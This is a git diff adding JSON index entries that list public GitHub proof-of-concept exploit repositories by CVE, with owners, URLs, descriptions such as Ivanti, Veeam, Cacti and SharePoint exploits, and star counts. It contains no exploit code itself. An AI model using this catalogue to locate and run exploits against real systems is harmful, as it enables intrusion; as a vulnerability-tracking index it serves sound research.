+ "description": "This repository contains a C program to test for CVE-2024-2961, a buffer overflow vulnerability in the iconv() function of glibc.",
+ "fork": false,
+ "created_at": "2024-06-03T23:53:43Z",
+ "updated_at": "2024-06-04T00:22:16Z",
+ "pushed_at": "2024-06-04T00:22:13Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "buffer",
+ "cve",
+ "cve-202402961",
+ "glibc",
+ "iconv",
+ "overflow",
+ "pentest",
+ "test",
+ "vulnerability"
+ ],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 810186958,
+ "name": "cve-2024-2961",
+ "full_name": "tnishiox\/cve-2024-2961",
+ "owner": {
+ "login": "tnishiox",
+ "id": 163162093,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/163162093?v=4",
+ "html_url": "https:\/\/github.com\/tnishiox"
+ },
+ "html_url": "https:\/\/github.com\/tnishiox\/cve-2024-2961",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-04T08:05:09Z",
+ "updated_at": "2024-06-04T09:01:19Z",
+ "pushed_at": "2024-06-04T09:01:16Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 810234472,
+ "name": "CVE-2024-2961_poc",
+ "full_name": "kjdfklha\/CVE-2024-2961_poc",
+ "owner": {
+ "login": "kjdfklha",
+ "id": 106435455,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/106435455?v=4",
+ "html_url": "https:\/\/github.com\/kjdfklha"
+ },
+ "html_url": "https:\/\/github.com\/kjdfklha\/CVE-2024-2961_poc",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-04T09:57:46Z",
+ "updated_at": "2024-06-04T10:02:48Z",
+ "pushed_at": "2024-06-04T10:02:44Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-29824.json b/2024/CVE-2024-29824.json
new file mode 100644
index 0000000000..c3d695c5f8
--- /dev/null
+++ b/2024/CVE-2024-29824.json
@@ -0,0 +1,62 @@
+[
+ {
+ "id": 814183258,
+ "name": "CVE-2024-29824",
+ "full_name": "horizon3ai\/CVE-2024-29824",
+ "owner": {
+ "login": "horizon3ai",
+ "id": 79593994,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/79593994?v=4",
+ "html_url": "https:\/\/github.com\/horizon3ai"
+ },
+ "html_url": "https:\/\/github.com\/horizon3ai\/CVE-2024-29824",
+ "description": "Ivanti EPM SQL Injection Remote Code Execution Vulnerability",
+ "fork": false,
+ "created_at": "2024-06-12T13:53:32Z",
+ "updated_at": "2024-06-20T23:38:18Z",
+ "pushed_at": "2024-06-12T14:04:39Z",
+ "stargazers_count": 11,
+ "watchers_count": 11,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 11,
+ "score": 0,
+ "subscribers_count": 5
+ },
+ {
+ "id": 816713290,
+ "name": "CVE-2024-29824",
+ "full_name": "R4be1\/CVE-2024-29824",
+ "owner": {
+ "login": "R4be1",
+ "id": 110738599,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/110738599?v=4",
+ "html_url": "https:\/\/github.com\/R4be1"
+ },
+ "html_url": "https:\/\/github.com\/R4be1\/CVE-2024-29824",
+ "description": "Ivanti EPM SQL Injection Remote Code Execution Vulnerability(Optimized version based on h3)",
+ "fork": false,
+ "created_at": "2024-06-18T09:07:23Z",
+ "updated_at": "2024-06-19T08:17:10Z",
+ "pushed_at": "2024-06-19T08:17:07Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-29849.json b/2024/CVE-2024-29849.json
new file mode 100644
index 0000000000..99b53c21e1
--- /dev/null
+++ b/2024/CVE-2024-29849.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 812906778,
+ "name": "CVE-2024-29849",
+ "full_name": "sinsinology\/CVE-2024-29849",
+ "owner": {
+ "login": "sinsinology",
+ "id": 77316200,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77316200?v=4",
+ "html_url": "https:\/\/github.com\/sinsinology"
+ },
+ "html_url": "https:\/\/github.com\/sinsinology\/CVE-2024-29849",
+ "description": "Veeam Backup Enterprise Manager Authentication Bypass (CVE-2024-29849)",
+ "fork": false,
+ "created_at": "2024-06-10T06:12:20Z",
+ "updated_at": "2024-06-24T08:35:05Z",
+ "pushed_at": "2024-06-13T08:40:57Z",
+ "stargazers_count": 79,
+ "watchers_count": 79,
+ "has_discussions": false,
+ "forks_count": 11,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 11,
+ "watchers": 79,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-29855.json b/2024/CVE-2024-29855.json
new file mode 100644
index 0000000000..25e1b93676
--- /dev/null
+++ b/2024/CVE-2024-29855.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 814554778,
+ "name": "CVE-2024-29855",
+ "full_name": "sinsinology\/CVE-2024-29855",
+ "owner": {
+ "login": "sinsinology",
+ "id": 77316200,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77316200?v=4",
+ "html_url": "https:\/\/github.com\/sinsinology"
+ },
+ "html_url": "https:\/\/github.com\/sinsinology\/CVE-2024-29855",
+ "description": "PoC for the Veeam Recovery Orchestrator Authentication CVE-2024-29855",
+ "fork": false,
+ "created_at": "2024-06-13T08:32:55Z",
+ "updated_at": "2024-06-24T14:58:30Z",
+ "pushed_at": "2024-06-17T10:45:06Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-29868.json b/2024/CVE-2024-29868.json
new file mode 100644
index 0000000000..3056613332
--- /dev/null
+++ b/2024/CVE-2024-29868.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 819463002,
+ "name": "CVE-2024-29868",
+ "full_name": "DEVisions\/CVE-2024-29868",
+ "owner": {
+ "login": "DEVisions",
+ "id": 88578649,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/88578649?v=4",
+ "html_url": "https:\/\/github.com\/DEVisions"
+ },
+ "html_url": "https:\/\/github.com\/DEVisions\/CVE-2024-29868",
+ "description": "Proof of concept of CVE-2024-29868 affecting Apache StreamPipes from 0.69.0 through 0.93.0",
+ "fork": false,
+ "created_at": "2024-06-24T14:53:05Z",
+ "updated_at": "2024-06-25T10:22:48Z",
+ "pushed_at": "2024-06-24T15:28:15Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-29895.json b/2024/CVE-2024-29895.json
new file mode 100644
index 0000000000..371fd1d419
--- /dev/null
+++ b/2024/CVE-2024-29895.json
@@ -0,0 +1,131 @@
+[
+ {
+ "id": 801030972,
+ "name": "CVE-2024-29895-CactiRCE-PoC",
+ "full_name": "Stuub\/CVE-2024-29895-CactiRCE-PoC",
+ "owner": {
+ "login": "Stuub",
+ "id": 60468836,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60468836?v=4",
+ "html_url": "https:\/\/github.com\/Stuub"
+ },
+ "html_url": "https:\/\/github.com\/Stuub\/CVE-2024-29895-CactiRCE-PoC",
+ "description": "CVE-2024-29895 PoC - Exploiting remote command execution in Cacti servers using the 1.3.X DEV branch builds",
+ "fork": false,
+ "created_at": "2024-05-15T13:11:45Z",
+ "updated_at": "2024-06-21T18:36:54Z",
+ "pushed_at": "2024-05-15T21:40:25Z",
+ "stargazers_count": 20,
+ "watchers_count": 20,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [
+ "0day",
+ "cacti",
+ "cactirce",
+ "cve-2024",
+ "cve-2024-29895",
+ "owasp",
+ "php",
+ "rce"
+ ],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 20,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 801392594,
+ "name": "CVE-2024-29895",
+ "full_name": "secunnix\/CVE-2024-29895",
+ "owner": {
+ "login": "secunnix",
+ "id": 104568161,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104568161?v=4",
+ "html_url": "https:\/\/github.com\/secunnix"
+ },
+ "html_url": "https:\/\/github.com\/secunnix\/CVE-2024-29895",
+ "description": "Cacti CVE-2024-29895 POC",
+ "fork": false,
+ "created_at": "2024-05-16T06:29:21Z",
+ "updated_at": "2024-05-16T19:17:05Z",
+ "pushed_at": "2024-05-16T15:29:52Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 0
+ },
+ {
+ "id": 801731520,
+ "name": "CVE-2024-29895.py",
+ "full_name": "ticofookfook\/CVE-2024-29895.py",
+ "owner": {
+ "login": "ticofookfook",
+ "id": 99700348,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99700348?v=4",
+ "html_url": "https:\/\/github.com\/ticofookfook"
+ },
+ "html_url": "https:\/\/github.com\/ticofookfook\/CVE-2024-29895.py",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-05-16T20:03:03Z",
+ "updated_at": "2024-05-16T20:05:37Z",
+ "pushed_at": "2024-05-16T20:05:33Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 802277498,
+ "name": "CVE-2024-29895",
+ "full_name": "Rubioo02\/CVE-2024-29895",
+ "owner": {
+ "login": "Rubioo02",
+ "id": 153825296,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/153825296?v=4",
+ "html_url": "https:\/\/github.com\/Rubioo02"
+ },
+ "html_url": "https:\/\/github.com\/Rubioo02\/CVE-2024-29895",
+ "description": "CVE-2024-29895 | RCE on CACTI 1.3.X dev",
+ "fork": false,
+ "created_at": "2024-05-17T22:03:29Z",
+ "updated_at": "2024-06-10T01:45:38Z",
+ "pushed_at": "2024-05-18T12:49:29Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 2
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-29972.json b/2024/CVE-2024-29972.json
new file mode 100644
index 0000000000..8a0fb9dc24
--- /dev/null
+++ b/2024/CVE-2024-29972.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 817750758,
+ "name": "CVE-2024-29972",
+ "full_name": "WanLiChangChengWanLiChang\/CVE-2024-29972",
+ "owner": {
+ "login": "WanLiChangChengWanLiChang",
+ "id": 171075497,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/171075497?v=4",
+ "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang"
+ },
+ "html_url": "https:\/\/github.com\/WanLiChangChengWanLiChang\/CVE-2024-29972",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-20T11:12:52Z",
+ "updated_at": "2024-06-20T11:21:17Z",
+ "pushed_at": "2024-06-20T11:21:14Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-29973.json b/2024/CVE-2024-29973.json
new file mode 100644
index 0000000000..f79cbb0d9c
--- /dev/null
+++ b/2024/CVE-2024-29973.json
@@ -0,0 +1,152 @@
+[
+ {
+ "id": 817231068,
+ "name": "CVE-2024-29973",
+ "full_name": "momika233\/CVE-2024-29973",
+ "owner": {
+ "login": "momika233",
+ "id": 56291820,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56291820?v=4",
+ "html_url": "https:\/\/github.com\/momika233"
+ },
+ "html_url": "https:\/\/github.com\/momika233\/CVE-2024-29973",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-19T09:28:46Z",
+ "updated_at": "2024-06-20T04:21:51Z",
+ "pushed_at": "2024-06-19T09:29:02Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 817257622,
+ "name": "CVE-2024-29973",
+ "full_name": "bigb0x\/CVE-2024-29973",
+ "owner": {
+ "login": "bigb0x",
+ "id": 13532434,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/13532434?v=4",
+ "html_url": "https:\/\/github.com\/bigb0x"
+ },
+ "html_url": "https:\/\/github.com\/bigb0x\/CVE-2024-29973",
+ "description": "POC for CVE-2024-29973",
+ "fork": false,
+ "created_at": "2024-06-19T10:34:56Z",
+ "updated_at": "2024-06-22T10:16:30Z",
+ "pushed_at": "2024-06-21T12:59:55Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 817562128,
+ "name": "CVE-2024-29973",
+ "full_name": "k3lpi3b4nsh33\/CVE-2024-29973",
+ "owner": {
+ "login": "k3lpi3b4nsh33",
+ "id": 118002757,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118002757?v=4",
+ "html_url": "https:\/\/github.com\/k3lpi3b4nsh33"
+ },
+ "html_url": "https:\/\/github.com\/k3lpi3b4nsh33\/CVE-2024-29973",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-20T01:52:35Z",
+ "updated_at": "2024-06-25T12:35:40Z",
+ "pushed_at": "2024-06-20T02:27:44Z",
+ "stargazers_count": 7,
+ "watchers_count": 7,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 7,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 818123344,
+ "name": "CVE-2024-29973",
+ "full_name": "p0et08\/CVE-2024-29973",
+ "owner": {
+ "login": "p0et08",
+ "id": 173439951,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/173439951?v=4",
+ "html_url": "https:\/\/github.com\/p0et08"
+ },
+ "html_url": "https:\/\/github.com\/p0et08\/CVE-2024-29973",
+ "description": "PoC and Bulk Scanner for CVE-2024-29973",
+ "fork": false,
+ "created_at": "2024-06-21T06:38:50Z",
+ "updated_at": "2024-06-21T07:00:51Z",
+ "pushed_at": "2024-06-21T07:00:48Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ },
+ {
+ "id": 818318428,
+ "name": "CVE-2024-29973",
+ "full_name": "RevoltSecurities\/CVE-2024-29973",
+ "owner": {
+ "login": "RevoltSecurities",
+ "id": 119435129,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/119435129?v=4",
+ "html_url": "https:\/\/github.com\/RevoltSecurities"
+ },
+ "html_url": "https:\/\/github.com\/RevoltSecurities\/CVE-2024-29973",
+ "description": "Exploiter a Vulnerability detection and Exploitation tool for CVE-2024-29973 with Asychronous Performance.",
+ "fork": false,
+ "created_at": "2024-06-21T15:20:52Z",
+ "updated_at": "2024-06-24T10:53:31Z",
+ "pushed_at": "2024-06-21T15:33:09Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 3,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 3,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-29988.json b/2024/CVE-2024-29988.json
new file mode 100644
index 0000000000..d41ed07cac
--- /dev/null
+++ b/2024/CVE-2024-29988.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 795499188,
+ "name": "CVE-2024-29988-exploit",
+ "full_name": "Sploitus\/CVE-2024-29988-exploit",
+ "owner": {
+ "login": "Sploitus",
+ "id": 168830967,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/168830967?v=4",
+ "html_url": "https:\/\/github.com\/Sploitus"
+ },
+ "html_url": "https:\/\/github.com\/Sploitus\/CVE-2024-29988-exploit",
+ "description": "Exploit for Microsoft SmartScreen malicious execution (april 2024)",
+ "fork": false,
+ "created_at": "2024-05-03T12:17:25Z",
+ "updated_at": "2024-06-12T01:09:56Z",
+ "pushed_at": "2024-05-03T12:57:49Z",
+ "stargazers_count": 4,
+ "watchers_count": 4,
+ "has_discussions": false,
+ "forks_count": 6,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 6,
+ "watchers": 4,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-30043.json b/2024/CVE-2024-30043.json
new file mode 100644
index 0000000000..30e3e971fe
--- /dev/null
+++ b/2024/CVE-2024-30043.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 811511540,
+ "name": "CVE-2024-30043-XXE",
+ "full_name": "W01fh4cker\/CVE-2024-30043-XXE",
+ "owner": {
+ "login": "W01fh4cker",
+ "id": 101872898,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101872898?v=4",
+ "html_url": "https:\/\/github.com\/W01fh4cker"
+ },
+ "html_url": "https:\/\/github.com\/W01fh4cker\/CVE-2024-30043-XXE",
+ "description": "Exploiting XXE Vulnerabilities on Microsoft SharePoint Server and Cloud via Confused URL Parsing",
+ "fork": false,
+ "created_at": "2024-06-06T18:31:57Z",
+ "updated_at": "2024-06-21T00:12:27Z",
+ "pushed_at": "2024-06-06T18:38:06Z",
+ "stargazers_count": 27,
+ "watchers_count": 27,
+ "has_discussions": false,
+ "forks_count": 1,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 1,
+ "watchers": 27,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-30056.json b/2024/CVE-2024-30056.json
new file mode 100644
index 0000000000..2ecea316e1
--- /dev/null
+++ b/2024/CVE-2024-30056.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 806410467,
+ "name": "Microsoft-Edge-Information-Disclosure",
+ "full_name": "absholi7ly\/Microsoft-Edge-Information-Disclosure",
+ "owner": {
+ "login": "absholi7ly",
+ "id": 72062217,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/72062217?v=4",
+ "html_url": "https:\/\/github.com\/absholi7ly"
+ },
+ "html_url": "https:\/\/github.com\/absholi7ly\/Microsoft-Edge-Information-Disclosure",
+ "description": "CVE-2024-30056 Microsoft Edge (Chromium-based) Information Disclosure Vulnerability",
+ "fork": false,
+ "created_at": "2024-05-27T06:37:34Z",
+ "updated_at": "2024-06-02T00:44:42Z",
+ "pushed_at": "2024-05-27T06:47:27Z",
+ "stargazers_count": 14,
+ "watchers_count": 14,
+ "has_discussions": false,
+ "forks_count": 4,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 4,
+ "watchers": 14,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-30088.json b/2024/CVE-2024-30088.json
new file mode 100644
index 0000000000..4ec638e7ae
--- /dev/null
+++ b/2024/CVE-2024-30088.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 819353425,
+ "name": "CVE-2024-30088",
+ "full_name": "tykawaii98\/CVE-2024-30088",
+ "owner": {
+ "login": "tykawaii98",
+ "id": 45362197,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/45362197?v=4",
+ "html_url": "https:\/\/github.com\/tykawaii98"
+ },
+ "html_url": "https:\/\/github.com\/tykawaii98\/CVE-2024-30088",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-06-24T10:37:26Z",
+ "updated_at": "2024-06-26T04:45:27Z",
+ "pushed_at": "2024-06-24T11:16:26Z",
+ "stargazers_count": 18,
+ "watchers_count": 18,
+ "has_discussions": false,
+ "forks_count": 5,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 5,
+ "watchers": 18,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-30212.json b/2024/CVE-2024-30212.json
new file mode 100644
index 0000000000..3a01692f67
--- /dev/null
+++ b/2024/CVE-2024-30212.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 813535717,
+ "name": "blackleak",
+ "full_name": "Fehr-GmbH\/blackleak",
+ "owner": {
+ "login": "Fehr-GmbH",
+ "id": 94897660,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/94897660?v=4",
+ "html_url": "https:\/\/github.com\/Fehr-GmbH"
+ },
+ "html_url": "https:\/\/github.com\/Fehr-GmbH\/blackleak",
+ "description": "CVE-2024-30212",
+ "fork": false,
+ "created_at": "2024-06-11T09:13:16Z",
+ "updated_at": "2024-06-16T15:28:02Z",
+ "pushed_at": "2024-06-11T09:54:26Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 0
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-30255.json b/2024/CVE-2024-30255.json
new file mode 100644
index 0000000000..071ad84abf
--- /dev/null
+++ b/2024/CVE-2024-30255.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 784316858,
+ "name": "Envoy-CPU-Exhaustion-Vulnerability-PoC",
+ "full_name": "blackmagic2023\/Envoy-CPU-Exhaustion-Vulnerability-PoC",
+ "owner": {
+ "login": "blackmagic2023",
+ "id": 149164084,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/149164084?v=4",
+ "html_url": "https:\/\/github.com\/blackmagic2023"
+ },
+ "html_url": "https:\/\/github.com\/blackmagic2023\/Envoy-CPU-Exhaustion-Vulnerability-PoC",
+ "description": "CVE-2024-30255 This repository contains a proof-of-concept (PoC) Python script to demonstrate the CPU exhaustion vulnerability in Envoy caused by a flood of CONTINUATION frames.",
+ "fork": false,
+ "created_at": "2024-04-09T15:59:50Z",
+ "updated_at": "2024-04-17T06:01:02Z",
+ "pushed_at": "2024-04-09T16:04:37Z",
+ "stargazers_count": 2,
+ "watchers_count": 2,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 2,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-30270.json b/2024/CVE-2024-30270.json
new file mode 100644
index 0000000000..2e3a53b185
--- /dev/null
+++ b/2024/CVE-2024-30270.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 818090111,
+ "name": "CVE-2024-30270-PoC",
+ "full_name": "Alchemist3dot14\/CVE-2024-30270-PoC",
+ "owner": {
+ "login": "Alchemist3dot14",
+ "id": 63059909,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63059909?v=4",
+ "html_url": "https:\/\/github.com\/Alchemist3dot14"
+ },
+ "html_url": "https:\/\/github.com\/Alchemist3dot14\/CVE-2024-30270-PoC",
+ "description": "The script exploits Mailcow vulnerabilities via XSS and RCE, emphasizing the need for robust security measures and responsible usage to enhance web application security.",
+ "fork": false,
+ "created_at": "2024-06-21T04:47:48Z",
+ "updated_at": "2024-06-21T18:40:54Z",
+ "pushed_at": "2024-06-21T13:00:06Z",
+ "stargazers_count": 3,
+ "watchers_count": 3,
+ "has_discussions": false,
+ "forks_count": 2,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 2,
+ "watchers": 3,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-30491.json b/2024/CVE-2024-30491.json
new file mode 100644
index 0000000000..698b2c6812
--- /dev/null
+++ b/2024/CVE-2024-30491.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 795962526,
+ "name": "CVE-2024-30491-Poc",
+ "full_name": "truonghuuphuc\/CVE-2024-30491-Poc",
+ "owner": {
+ "login": "truonghuuphuc",
+ "id": 20487674,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20487674?v=4",
+ "html_url": "https:\/\/github.com\/truonghuuphuc"
+ },
+ "html_url": "https:\/\/github.com\/truonghuuphuc\/CVE-2024-30491-Poc",
+ "description": "CVE-2024-30491 ProfileGrid <= 5.7.8 - Authenticated (Subscriber+) SQL Injection",
+ "fork": false,
+ "created_at": "2024-05-04T14:22:15Z",
+ "updated_at": "2024-05-25T14:35:17Z",
+ "pushed_at": "2024-05-04T18:36:15Z",
+ "stargazers_count": 1,
+ "watchers_count": 1,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 1,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-30614.json b/2024/CVE-2024-30614.json
new file mode 100644
index 0000000000..3815e0741d
--- /dev/null
+++ b/2024/CVE-2024-30614.json
@@ -0,0 +1,32 @@
+[
+ {
+ "id": 782855972,
+ "name": "CVE-2024-30614",
+ "full_name": "Lucky-lm\/CVE-2024-30614",
+ "owner": {
+ "login": "Lucky-lm",
+ "id": 104305063,
+ "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/104305063?v=4",
+ "html_url": "https:\/\/github.com\/Lucky-lm"
+ },
+ "html_url": "https:\/\/github.com\/Lucky-lm\/CVE-2024-30614",
+ "description": null,
+ "fork": false,
+ "created_at": "2024-04-06T08:26:04Z",
+ "updated_at": "2024-04-06T08:26:04Z",
+ "pushed_at": "2024-04-06T08:26:04Z",
+ "stargazers_count": 0,
+ "watchers_count": 0,
+ "has_discussions": false,
+ "forks_count": 0,
+ "allow_forking": true,
+ "is_template": false,
+ "web_commit_signoff_required": false,
+ "topics": [],
+ "visibility": "public",
+ "forks": 0,
+ "watchers": 0,
+ "score": 0,
+ "subscribers_count": 1
+ }
+]
\ No newline at end of file
diff --git a/2024/CVE-2024-30656.json b/2024/CVE-2024-30656.json
